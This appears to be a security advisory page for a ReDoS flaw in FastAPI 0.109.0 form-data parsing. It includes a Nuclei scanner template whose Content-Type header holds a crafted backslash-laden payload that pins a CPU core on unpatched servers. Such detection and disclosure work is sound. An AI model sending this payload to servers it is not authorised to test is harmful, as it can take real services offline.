ReDoS Vulnerability in Form Data Parsing
A Regular Expression Denial of Service (ReDoS) vulnerability was identified in FastAPI version 0.109.0, specifically when parsing Form data. The issue, which causes the server to lock up and a CPU core to reach 100% usage, was patched in version 0.109.1.
Available publicly on Mar 15 2024 | Available with Premium on Mar 14 2024
Nuclei Template
Nuclei Template
1id: fastapi-redos
2info:
3 name: Check FastAPI ReDoS Vulnerability in Form Data Parsing
4 author: DanMcInerney, byt3bl33d3r, nicecatch2000
5 severity: high
6 description: Checks for ReDoS vulnerability in FastAPI when parsing form data with a malicious Content-Type header.
7 reference:
8 - https://huntr.com/bounties/dd680268-d735-4f33-a358-d827694ab035
9 classification:
10 cvss-score: 7.5
11 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
12 cwe-id: CWE-400 # Resource Exhaustion
13 tags: fastapi, redos, dos, vulnerability, ai, ml, protectai, huntr
14requests:
15 - method: POST
16 path:
17 - "{{BaseURL}}/submit/"
18 headers:
19 Content-Type: "application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'"
20 body: "input=1"
21 matchers-condition: and
22 matchers:
23 - type: status
24 status:
25 - 500
26 - 502
27 - 504
28 - type: time
29 time: 5000 # Milliseconds, you may adjust this threshold based on expected response timesResources
Learn how to use the Nuclei scanners and other scripts, or download the scanners and use them yourself.
Want more out of Sightline?
Sightline offers even more for premium customers
Go Premium
We have - related security advisories that are available with Sightline Premium.